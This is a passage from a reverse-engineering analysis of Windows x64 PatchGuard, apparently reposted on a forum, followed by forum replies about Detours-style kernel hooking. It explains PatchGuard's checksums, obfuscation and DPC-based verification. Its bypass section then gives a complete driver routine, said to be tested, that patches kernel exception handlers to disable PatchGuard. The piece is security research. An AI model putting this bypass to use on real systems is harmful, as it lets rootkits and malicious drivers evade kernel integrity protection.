sizeof(ULONG64)) { Checksum ^= *(PULONG64)BaseAddress; Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits); BlockSize -= sizeof(ULONG64); BaseAddress += sizeof(ULONG64); } // Checksum aligned blocks while (BlockSize-- > 0) { Checksum ^= *(PUCHAR)BaseAddress; Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits); BaseAddress++; } Checksum32 = (ULONG)Checksum; Checksum >>= 31; do { Checksum32 ^= (ULONG)Checksum; Checksum >>= 31; } while (Checksum); The end result is that Checksum32 holds the checksum of the block which is subsequently stored in the Checksum attribute of the checksum state structure along with the original block size and block base address that were passed to the function. For the purpose of initializing the checksum of image sections, nt!PgCreateImageSubContext calls into nt!PgCreateImageSectionSubContext which is prototyped as: PPATCHGUARD_SUB_CONTEXT PgCreateImageSectionSubContext( IN PPATCHGUARD_CONTEXT ParentContext, IN PVOID SymbolAddress, IN ULONG SubContextSize, IN PVOID ImageBase); This routine first checks to see if nt!KiOpPrefetchPatchCount is zero. If it is not, a block checksum context is created that does not cover all of the sections in the image. This could presumably be related to detecting whether or not hot patches have been applied, but this has not been confirmed. Otherwise, the function appears to enumerate the various sections included in the supplied image, calculating the checksum across each. It appears to exclude checksums of sections named INIT, PAGEVRFY, PAGESPEC, and PAGEKD. To account for an image's Import Address Table and Import Directory, nt!PgCreateImageSubContext calls nt!PgCreateBlockChecksumSubContext on the directory entries for both, but only if the directory entries exist and are valid for the supplied image. 3.2.2) GDT/IDT The protection of the Global Descriptor Table (GDT) and the Interrupt Descriptor Table (IDT) is another important feature of PatchGuard. The GDT is used to describe memory segments that are used by the kernel. It is especially lucrative to malicious applications due to the fact that modifying certain key GDT entries could lead to non-privileged, user-mode applications being able to modify kernel memory. The IDT is also useful, both in a malicious context and in a legitimate context. In some cases, third parties may wish to intercept certain hardware or software interrupts before passing it off to the kernel. Unless done right, hooking IDT entries can be very dangerous due to the considerations that have to be made when running in the context of an interrupt request handler. The actual implementation of GDT/IDT protection is accomplished through the use of the nt!PgCreateBlockChecksumSubContext function which is passed the contents of both descriptor tables. Since the registers that hold the GDT and IDT are relative to a given processor, PatchGuard creates a separate context for each table on each individual processor. To obtain the address of the GDT and the IDT for a given processor, PatchGuard first uses nt!KeSetAffinityThread to ensure that it's running on a specific processor. After that, it makes a call to nt!KiGetGdtIdt which stores the GDT and the IDT base addresses as output parameters as shown in the prototype below: VOID KiGetGdtIdt( OUT PVOID *Gdt, OUT PVOID *Idt); The actual protection of the GDT and the IDT is done in the context of two separate functions that have been labeled nt!PgCreateGdtSubContext and PgCreateIdtSubContext. These routines are prototyped as shown below: PPATCHGUARD_SUB_CONTEXT PgCreateGdtSubContext( IN PPATCHGUARD_CONTEXT ParentContext, IN UCHAR ProcessorNumber); PPATCHGUARD_SUB_CONTEXT PgCreateIdtSubContext( IN PPATCHGUARD_CONTEXT ParentContext, IN UCHAR ProcessorNumber); Both routines are called in the context of a loop that iterates across all of the processors on the machine with respect to nt!KeNumberProcessors. 3.2.3) SSDT One of the areas most notorious for being hooked by third-party drivers is the System Service Descriptor Table, also known as the SSDT. This table contains information about the service tables that are used by the operating for dispatching system calls. On Windows x64 kernels, nt!KeServiceDescriptorTable conveys the address of the actual dispatch table and the number of entries in the dispatch table for the native system call interface. In this case, the actual dispatch table is stored as an array of relative offsets in nt!KiServiceTable. The offsets are relative to the array itself using relative addressing. To obtain the absolute address of system service routines, the following approach can be used: lkd> u dwo(nt!KiServiceTable)+nt!KiServiceTable L1 nt!NtMapUserPhysicalPagesScatter: fffff800`013728b0 488bc4 mov rax,rsp lkd> u dwo(nt!KiServiceTable+4)+nt!KiServiceTable L1 nt!NtWaitForSingleObject: fffff800`012b83a0 4c89442418 mov [rsp+0x18],r8 The fact that the dispatch table now contains an array of relative addresses is one hurdle that driver developers who intend to port system call hooking code from 32-bit platforms to the x64 kernel will have to overcome. One solution to the relative address problem is fairly simple. There are plenty of places within the 2 GB of relative addressable memory that a trampoline could be placed for a hook routine. For instance, there is often alignment padding between symbols. This approach is rather hackish and it depends on the fact that PatchGuard is forcibly disabled. However, there are also other, more elegant approaches to accomplishing this that require neither. As far as protecting the system service table is concerned, PatchGuard protects both the native system service dispatch table stored in nt!KiServiceTable as well as the nt!KeServiceDescriptorTable structure itself. This is done by making use of the nt!PgCreateBlockChecksumSubContext routine that was mentioned in the section on system images (). The following code shows how the block checksum routine is called for both items: PgCreateBlockChecksumSubContext( ParentContext, 0, KeServiceDescriptorTable->DispatchTable, // KiServiceTable KiServiceLimit * sizeof(ULONG), 0, NULL); PgCreateBlockChecksumSubContext( ParentContext, 0, &KeServiceDescriptorTable, 0x20, 0, NULL); The reason the nt!KeServiceDescriptorTable structure is also protected is to prevent the modification of the attribute that points to the actual dispatch table. 3.2.4) Processor MSRs The latest and greatest processors have greatly improved the methods through which user-mode to kernel-mode transitions are accomplished. Prior to these enhancements, most operating systems, including Windows, were forced to dedicate a soft-interrupt for exclusive use as a system call vector. Newer processors have a dedicated instruction set for dispatching system calls, such as the syscall and sysenter instructions. Part of the way in which these instructions work is by taking advantage of a processor-defined model-specific register (MSR) that contains the address of the routine that is intended to gain control in kernel-mode when a system call is received. On the x64 architecture, the MSR that controls this value is named LSTAR which is short for Long System Target-Address Register. The code associated with this MSR is 0xc0000082. During boot, the x64 kernel initializes this MSR to nt!KiSystemCall64. In order for Microsoft to prevent third parties from hooking system calls by changing the value of the LSTAR MSR, PatchGuard creates a protection sub-context of type 7 in order to cache the value of the MSR. The routine that is responsible for accomplishing this has been labeled PgCreateMsrSubContext and its prototype is shown below: PPATCHGUARD_SUB_CONTEXT PgCreateMsrSubContext( IN PPATCHGUARD_CONTEXT ParentContext, IN UCHAR Processor); Like the GDT/IDT protection, the LSTAR MSR value must be obtained on a per-processor basis since MSR values are inherently stored on individual processors. To support this, the routine is called in the context of a loop through all of the processors and is passed the processor identifier that it is to read from. In order to ensure that the MSR value is obtained from the right processor, PatchGuard makes use of nt!KeSetAffinityThread to cause the calling thread to run on the appropriate processor. 3.2.5) Debug Routines PatchGuard creates a special sub-context (type 6), that is used to protect some internal routines that are used for debugging purposes by the kernel. These routines, such as nt!KdpStub, are intended to be used as a mechanism by which an attached debugger can handle an exception prior to allowing the kernel to dispatch it. bt!KdpStub is called indirectly through the nt!KiDebugRoutine global variable from nt!KiDispatchException. The routine that initializes the protection sub-context for these routines has been labeled nt!PgCreateDebugRoutineSubContext and is prototyped as shown below: PPATCHGUARD_SUB_CONTEXT PgCreateDebugRoutineSubContext( IN PPATCHGUARD_CONTEXT ParentContext); It appears that the sub-context structure is initialized with pointers to nt!KdpStub, nt!KdpTrap, and nt!KiDebugRoutine. It seems that this sub-context is intended to protect from a third-party driver modifying the nt!KiDebugRoutine to point elsewhere. There may be other intentions as well. 3.3) Obfuscating the PatchGuard Contexts In order to make it more challenging to locate the PatchGuard contexts in memory, each context is XOR'd with a randomly generated 64-bit key. This is accomplished by calling the function that has been labeled nt!PgEncryptContext that inline XOR's the supplied context buffer and then returns the XOR key that was used to encrypt it. This function is prototyped as shown below: ULONG64 PgEncryptContext( IN OUT PPATCHGUARD_CONTEXT Context); After nt!KiInitializePatchGuard has initialized all of the individual sub-contexts, the next thing that it does is encrypt the primary PatchGuard context. To accomplish this, it first makes a copy of the context on the stack so that it can be referenced in plain-text after being encrypted. The reason the plain-text copy is needed is so that the verification routine can be queued for execution, and in order to do that it is necessary to reference some of the attributes of the context structure. This is discussed more in the following section. After the copy has been created, a call is made to nt!PgEncryptContext passing the primary PatchGuard context as the first argument. Once the verification routine has been queued for execution, the plain-text copy is no longer needed and is set back to zero in order to ensure that no reference is left in the clear. The pseudo code below illustrates this behavior: PATCHGUARD_CONTEXT LocalCopy; ULONG64 XorKey; memmove( &LocalCopy, Context, sizeof(PATCHGUARD_CONTEXT)); // 0x1b8 XorKey = PgEncryptContext( Context); ... Use LocalCopy for verification routine queuing ... memset( &LocalCopy, 0, sizeof(LocalCopy)); 3.4) Executing the PatchGuard Verification Routine Gathering the checksums and caching critical structure values is great, but it means absolutely nothing if there is no means by which it can be validated. To that effect, PatchGuard goes to great lengths to make the execution of the validation routine as covert as possible. This is accomplished through the use of misdirection and obfuscation. After all of the sub-contexts have been initialized, but prior to encrypting the primary context, nt!KiInitializePatchGuard performs one of its more critical operations. In this phase, the routine that will be indirectly used to handle the PatchGuard verification is selected at random from an array of function pointers and is stored at offset 0x168 in the primary PatchGuard context. The functions found within the array have a very special purpose that will be discussed in more detail later in this section. For now, earmark the fact that a verification routine has been selected. Following the selection of a verification routine, the primary PatchGuard context is encrypted as described in the previous section. After the encryption completes, a timer is initialized that makes use of a sub-context that was allocated early on in the PatchGuard initialization process by nt!KiInitializePatchGuard. The timer is initialized through a call to nt!KeInitializeTimer where the pointer to the timer structure that is passed in is actually part of the sub-context structure allocated earlier. Immediately following the initialized timer structure in memory at offset 0x88 is the word value 0x1131. When disassembled, these two bytes translate to a xor [rcx], edx instruction. If one looks closely at the first two bytes of nt!CmpAppendDllSection, one will see that its first instruction is composed of exactly those two bytes. Though not important at this juncture, it may be of use later. With the timer structure initialized, PatchGuard begins the process of queuing the timer for execution by calling a function that has been labeled nt!PgInitializeTimer which is prototyped as shown below: VOID PgInitializeTimer( IN PPATCHGUARD_CONTEXT Context, IN PVOID EncryptedContext, IN ULONG64 XorKey, IN ULONG UnknownZero); Inside the nt!PgInitializeTimer routine, a few strange things occur. First, a DPC is initialized that uses the randomly selected verification routine described earlier in this section as the DeferredRoutine. The EncryptedContext pointer that is passed in as an argument is then XOR'd with the XorKey argument to produce a completely bogus pointer that is passed as the DeferredContext argument to nt!KeInitializeDpc. The end result is pseudo-code that looks something like this: KeInitializeDpc( &Dpc, Context->TimerDpcRoutine, EncryptedContext ^ ~(XorKey << UnknownZero)); After the DPC has been initialized, a call is made to nt!KeSetTimer that queues the DPC for execution. The DueTime argument is randomly generated as to make it harder to signature with a defined upper bound in order to ensure that it is executed within a reasonable time frame. After setting the timer, nt!PgInitializeTimer returns to the caller. With the timer initialized and set to execute, nt!KiInitializePatchGuard has completed its operation and returns to nt!KiFilterFiberContext. The divide error fault that caused the whole initialization process to start is corrected and execution is restored back to the instruction following the div in nt!KiDivide6432, thus allowing the kernel to boot as normal. That's only half of the fun, though. The real question now is how the validation routine gets executed. It seems obvious that it's related to the DPC routine that was used when the timer was set, so the most logical place to look is there. Recalling from earlier in this section, nt!KiInitializePatchGuard selected a validation routine address from an array of routines at random. This array is found by looking at this disassembly from the PatchGuard initialization routine: nt!KiDivide6432+0xec3: fffff800`01423e74 8bc1 mov eax,ecx fffff800`01423e76 488d0d83c1bdff lea rcx,[nt] fffff800`01423e7d 488b84c128044300 mov rax,[rcx+rax*8+0x430428] Again, the same obfuscation technique that was used to hide the pool tag array is used here. By adding 0x430428 to the base address of nt, the array of DPC routines is revealed: lkd> dqs nt+0x430428 L3 fffff800`01430428 fffff800`01033b10 nt!KiScanReadyQueues fffff800`01430430 fffff800`011010e0 nt!ExpTimeRefreshDpcRoutine fffff800`01430438 fffff800`0101dd10 nt!ExpTimeZoneDpcRoutine This tells us the possible permutations for DPC routines that PatchGuard may use, but it doesn't tell us how this actually leads to the validation of the protection contexts. Logically, the next step is to attempt to understand how one of these routines operates based on the DeferredContext that is passed to is since it is known, from nt!PgInitializeTimer, that the DeferredContext argument will point to the PatchGuard context XOR'd with an encryption key. Of the three, routines, nt!ExpTimeRefreshDpcRoutine is the easiest to understand. The disassembly of the first few instructions of this function is shown below: lkd> u nt!ExpTimeRefreshDpcRoutine nt!ExpTimeRefreshDpcRoutine: fffff800`011010e0 48894c2408 mov [rsp+0x8],rcx fffff800`011010e5 4883ec68 sub rsp,0x68 fffff800`011010e9 b801000000 mov eax,0x1 fffff800`011010ee 0fc102 xadd [rdx],eax fffff800`011010f1 ffc0 inc eax fffff800`011010f3 83f801 cmp eax,0x1 Deferred routines are prototyped as taking a pointer to the DPC that they are associated with as the first argument and the DeferredContext pointer as the second argument. The x64 calling convention tells us that this would equate to rcx pointing to the DPC structure and rdx pointing to the DeferredContext pointer. There's a problem though. The fourth instruction of the function attempts to perform an xadd on the first portion of the DeferredContext. As was stated earlier, the DeferredContext that is passed to the DPC routine is the result of an XOR operation with a pointer which products a completely bogus pointer. This should mean that the box would crash immediately upon de-referencing the pointer, right? It's obvious that the answer is no, and it's here that another case of misdirection is seen. The fact of the matter is that nt!ExpTimeRefreshDpcRoutine, nt!ExpTimeZoneDpcRoutine, and nt!KiScanReadyQueues are all perfectly legitimate routines that have nothing directly to do with PatchGuard at all. Instead, they are used as an indirect means of executing the code that does have something to do with PatchGuard. The unique thing about these three routines is that they all three de-reference their DeferredContext pointer at some point as shown below: lkd> u fffff800`01033b43 L1 nt!KiScanReadyQueues+0x33: fffff800`01033b43 8b02 mov eax,[rdx] lkd> u fffff800`0101dd1e L1 nt!ExpTimeZoneDpcRoutine+0xe: fffff800`0101dd1e 0fc102 xadd [rdx],eax When the DeferredContext operation occurs a General Protection Fault exception is raised and is passed on to nt!KiGeneralProtectionFault. This routine then eventually leads to the execution of the exception handler that is associated with the routine that triggered the fault, such as nt!ExpTimeRefreshDpcRoutine. On x64, the exception handling code is completely different than what most people are used to on 32-bit. Rather than functions registering exception handlers at runtime, each function specifies its exception handlers at compile time in a way that allows them to be looked up through a standardize API routine, like nt!RtlLookupFunctionEntry. This API routine returns information about the function in the RUNTIMEFUNCTION structure which most importantly includes unwind information. The unwind information includes the address of the exception handler, if any. While this is mostly outside of the scope of this document, one can determine the address of nt!ExpTimeRefreshDpcRoutine's exception handler by doing the following in the debugger: lkd> .fnent nt!ExpTimeRefreshDpcRoutine Debugger function entry 00000000`01cdaa4c for: (fffff800`011010e0) nt!ExpTimeRefreshDpcRoutine | (fffff800`011011d0) nt!ExpCenturyDpcRoutine Exact matches: nt!ExpTimeRefreshDpcRoutine = <no type information> BeginAddress = 00000000`001010e0 EndAddress = 00000000`0010110d UnwindInfoAddress = 00000000`00131274 lkd> u nt + dwo(nt + 00131277 + (by(nt + 00131276) * 2) + 13) nt!ExpTimeRefreshDpcRoutine+0x40: fffff800`01101120 8bc0 mov eax,eax fffff800`01101122 55 push rbp fffff800`01101123 4883ec30 sub rsp,0x30 fffff800`01101127 488bea mov rbp,rdx fffff800`0110112a 48894d50 mov [rbp+0x50],rcx Looking more closely at this exception handler, it can be seen that it issues a call to nt!KeBugCheckEx under a certain condition with bug check code 0x109. This bug check code is what is used by PatchGuard to indicate that a critical structure has been tampered with, so this is a very good indication that this exception handler is at least either in whole, or in part, associated with PatchGuard. The exception handlers for each of the three routines are roughly equivalent and perform the same operations. If the DeferredContext has not been tampered with unexpectedly then the exception handlers eventually call into the protection context's copy of the code from INITKDB, specifically the nt!FsRtlUninitializeSmallMcb. This routine calls into the symbol named nt!FsRtlMdlReadCompleteDevEx which is actually what is responsible for calling the various sub-context verification routines. 3.5) Reporting Verification Inconsistencies In the event that PatchGuard detects that a critical structure has been modified, it calls the code-copy version of the symbol named nt!SdpCheckDll with parameters that will be subsequently passed to nt!KeBugCheckEx via the function table stored in the PatchGuard context. The purpose of nt!SdbpCheckDll is to zero out the stack and all of the registers prior to the current frame before jumping to nt!KeBugCheckEx. This is presumably done to attempt to make it impossible for a third-party driver to detect and recover from the bug check report. If all of the checks go as planned and there are no inconsistencies, the routine creates a new PatchGuard context and sets the timer again using the same routine that was selected the first time. 4) Bypass Approaches With the most critical aspects of how PatchGuard operates explained, the next goal is to attempt to see if there are any ways in which the protection mechanisms offered by it can be bypassed. This would entail either disabling or tricking the validation routine. While there are many obvious approaches, such as the creation of a custom boot loader that runs prior to PatchGuard initializing, or through the modification of ntoskrnl.exe to completely exclude the initialization vector, the approaches discussed in this chapter are intended to be usable in a real-world environment without having to resort to intrusive operations and without requiring a reboot of the machine. In fact, the primary goal is to create a single standalone function, or a few functions, that can be dropped into device drivers in a manner that allows them to just call one routine to disable the PatchGuard protections so that the driver's existing approaches for hooking critical structures can still be used. It is important to note that some of the approaches listed here have not been tested and are simply theoretical. The ones that have been tested will be indicated as such. Prior to diving into the particular bypass approaches, though, it is also important to consider general techniques for disabling PatchGuard on the fly. First, one must consider how the validation routine is set up to run and what it depends on to accomplish validation. In this case, the validation routine is set to run in the context of a timer that is associated with a DPC that runs from a system worker thread that eventually leads to the calling of an exception handler. The DPC routine that is used is randomly selected from a small pool of functions and the timer object is assigned a random DueTime in an effort to make it harder to detect. Aside from the validation vector, it is also known that when PatchGuard encounters an inconsistency it will call nt!KeBugCheckEx with a specific bug check code in an attempt to crash the system. These tidbits of understanding make it possible to consider a wide range of bypass approaches. 4.1) Exception Handler Hooking Since it is known that the validation routines indirectly depend on the exception handlers associated with the three timer DPC routines to run code, it stands to reason that it may be possible to change the behavior of each exception handler to simply become a no-operation. This would mean that once the DPC routine executes and triggers the general protection fault, the exception handler will get called and will simply perform no operation rather than doing the validation checks. This approach has been tested and has been confirmed to work on the current implementation of PatchGuard. The approach taken to accomplish this is to first find the list of routines that are known to be associated with PatchGuard. As it stands today, the list only contains three functions, but it may be the case that the list will change in the future. After locating the array of routines, each routine's exception handler must be extracted and then subsequently patched to return 0x1 and then return. An example function that implements this algorithm can be found below: static CHAR CurrentFakePoolTagArray[] = "AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc"; NTSTATUS DisablePatchGuard() { UNICODE_STRING SymbolName; NTSTATUS Status = STATUS_SUCCESS; PVOID * DpcRoutines = NULL; PCHAR NtBaseAddress = NULL; ULONG Offset; RtlInitUnicodeString( &SymbolName, L"__C_specific_handler"); do { // // Get the base address of nt // if (!RtlPcToFileHeader( MmGetSystemRoutineAddress(&SymbolName), (PCHAR *)&NtBaseAddress)) { Status = STATUS_INVALID_IMAGE_FORMAT; break; } // // Search the image to find the first occurrence of: // // "AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc" // // This is the fake tag pool array that is used to allocate protection // contexts. // __try { for (Offset = 0; !DpcRoutines; Offset += 4) { // // If we find a match for the fake pool tag array, the DPC routine // addresses will immediately follow. // if (memcmp( NtBaseAddress + Offset, CurrentFakePoolTagArray, sizeof(CurrentFakePoolTagArray) - 1) == 0) DpcRoutines = (PVOID *)(NtBaseAddress + Offset + sizeof(CurrentFakePoolTagArray) + 3); } } __except(EXCEPTION_EXECUTE_HANDLER) { // // If an exception occurs, we failed to find it. Time to bail out. // Status = GetExceptionCode(); break; } DebugPrint(("DPC routine array found at %p.", DpcRoutines)); // // Walk the DPC routine array. // for (Offset = 0; DpcRoutines[Offset] && NT_SUCCESS(Status); Offset++) { PRUNTIME_FUNCTION Function; ULONG64 ImageBase; PCHAR UnwindBuffer; UCHAR CodeCount; ULONG HandlerOffset; PCHAR HandlerAddress; PVOID LockedAddress; PMDL Mdl; // // If we find no function entry, then go on to the next entry. // if ((!(Function = RtlLookupFunctionEntry( (ULONG64)DpcRoutines[Offset], &ImageBase, NULL))) || (!Function->UnwindData)) { Status = STATUS_INVALID_IMAGE_FORMAT; continue; } // // Grab the unwind exception handler address if we're able to find one. // UnwindBuffer = (PCHAR)(ImageBase + Function->UnwindData); CodeCount = UnwindBuffer[2]; // // The handler offset is found within the unwind data that is specific // to the language in question. Specifically, it's +0x10 bytes into // the structure not including the UNWIND_INFO structure itself and any // embedded codes (including padding). The calculation below accounts // for all these and padding. // HandlerOffset = *(PULONG)((ULONG64)(UnwindBuffer + 3 + (CodeCount * 2) + 20) & ~3); // // Calculate the full address of the handler to patch. // HandlerAddress = (PCHAR)(ImageBase + HandlerOffset); DebugPrint(("Exception handler for %p found at %p (unwind %p).", DpcRoutines[Offset], HandlerAddress, UnwindBuffer)); // // Finally, patch the routine to simply return with 1. We'll patch // with: // // 6A01 push byte 0x1 // 58 pop eax // C3 ret // // // Allocate a memory descriptor for the handler's address. // if (!(Mdl = MmCreateMdl( NULL, (PVOID)HandlerAddress, 4))) { Status = STATUS_INSUFFICIENT_RESOURCES; continue; } // // Construct the Mdl and map the pages for kernel-mode access. // MmBuildMdlForNonPagedPool( Mdl); if (!(LockedAddress = MmMapLockedPages( Mdl, KernelMode))) { IoFreeMdl( Mdl); Status = STATUS_ACCESS_VIOLATION; continue; } // // Interlocked exchange the instructions we're overwriting with. // InterlockedExchange( (PLONG)LockedAddress, 0xc358016a); // // Unmap and destroy the MDL // MmUnmapLockedPages( LockedAddress, Mdl); IoFreeMdl( Mdl); } } while (0); return Status; } The benefits of this approach include the fact that it is small and relatively simplistic. It is also quite fault tolerant in the event that something changes. However, some of the cons include the fact that it depends on the pool tag array being situated immediately prior to the array of DPC routine addresses and it furthermore depends on the pool tag array being a fixed value. It's perfectly within the realm of possibility that Microsoft will eliminate this assumption in the future. For these reasons, it would be better to not use this approach in a production driver, but it is at least suitable enough for a demonstration. In order for Microsoft to break this approach they would have to make some of the assumptions made by it unreliable. For instance, the array of DPC routines could be moved to a location that is not immediately after the array of pool tags. This would mean that the routine would have to hardcode or otherwise derive the array of DPC routines used by PatchGuard. Another option would be to split the pool tag array out such that it isn't a condensed string that can be easily searched for. In reality, the relative level of complexities involved in preventing this approach from being reliable to implement are quite small. 4.2) KeBugCheckEx Hook One of the unavoidable facts of PatchGuard's protection is that it has to report validation inconsistencies in some manner. In fact, the manner in which it reports it has to entail shutting down the machine in order to prevent third-party vendors from being able to continue running code even after a patch has been detected. As it stands right now, the approach taken to accomplish this is to issue a bug check with the symbolic code of 0x109 via nt!KeBugCheckEx. This route was taken so that the end-user would be aware of what had occurred and not be left in the dark, literally, if their machine were to all of the sudden shut off or reboot without any word of explanation. The first idea the authors had when thinking about bypass techn |
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7楼#
发布于:2007-03-01 19:47
在VISTA64下测试看看,一般不HOOK NTOS的一般问题不大,MS不可能保护每个驱动......
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8楼#
发布于:2008-10-16 15:05
64位下的jmp [64_address]的操作码应该是FF 25,FF 15是CALL的操作码!
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9楼#
发布于:2008-10-19 05:25
Re:detours, x86 kernel hook 以及 x64 kernel hoo
这文章是转载的?而且是翻译的过来的?好像有些地方说的不对吧.. detours x86的第二点和第三点缺陷是怎么回事情? 第二个部分怎么会跳到int3上去? 确实detours里面只有反编译器没有解释执行的功能.但是这足够了... detours会修改前5个字节为一个jmp jmp过去了以后再jmp回到原来的函数里面并不一定是第5个字节开始的地址 detours会分析前面5个字节里面的指令 以指令为单位进行修改.而不是只是修改5个字节 覆盖了的指令会被复制一份 在跳转到原始函数之前 被复制的那些指令先被执行 并且它也保证不会jmp到一条指令的中间 比如第二个例子 hook以前的代码如果是 old_func: nop nop nop nop ; 一共4个字节的nop xor eax,eax ;这个行会占2个字节 指令代码是0x33 0xc0 jz skip_int3 int 3 skip_int3: nop hook以后的代码是 old_func: jmp hook_func ; e9 xxxxxxxx nop ; 注意这里有一个字节的nop,这里也许是cc(int 3),也是原始的0xc0要看版本 hook_jmp: ; hook的代码执行完了会跳到这里来 jz skip_int3 int 3 skip_int3: nop hook_func: pushad ; 保存寄存器 pushf [...........] popf popad ; 恢复寄存器 ;这里是复制的原来的指令. nop nop nop nop ; 4个nop xor eax,eax ; 因为前面4个nop只有4个字节,而我们需要写5个字节所以这条指令也要复制 jmp hook_jmp; 跳回去,注意这个jmp并不修改eflags,所以接下来的jz一样会跳过int3 如果你是想说开头5个字节里面有使用相对eip地址的指令 那么detours也是会去修改这些指令字节的 另外jeax是个什么指令? 能直接根据eax跳转? 我怎么记得只有ecx才有这种功能的? 假设你想说的jeax就是jz 那么 xor eax,eax 是2个字节 jz skip_int3 是2个字节 int 3 是1个字节 skip_int3: nop 这里刚刚5个字节 这5个字节被替换成一个jmp 同时这5个字节将被复制到hook函数的末尾 看起来是这样的 popad xor eax,eax jz adjust_addr int 3 adjust_addr: jmp skip_int3 ;这就是原来函数里面的int 3指令后面那条指令的地址 没问题...int 3是不会被执行的.. 第三点这里是有问题.但是不是你描述的这样吧? 跳回到前5个字节的开头是没问题的.有问题的是跳回到这5个字节的中间 这样的才有问题 old_func: nop error_addr: nop nop nop nop ;这里开头5个nop会被修改成一个jmp [.....] jmp error_addr ;这里想要跳转到error_addr的地方.但这个地址是一条指令(被修改过的jmp)的中间 [....] jmp old_func; 这里没问题..又会再执行一次hook的代码.不会有什么错误 另外...上面的例子里面有些pushad/popad这些指令 其实detours里面并没有这些指令 因为detours本来只是面向c的.. 所以detours按照c的调用法则 再调用你的hook函数之前 并不为你保存eax,ecx,edx 而其余的ebx,esi,edi,ebp也是按照c的调用法则该由你来负责保存和恢复的 这里有个小问题就是fastcall使用ecx,edx来传递参数.. 不过detours其实只是破坏了eax的值.. 如果你去hook一个fastcall的函数..你需要保存恢复ecx和edx |
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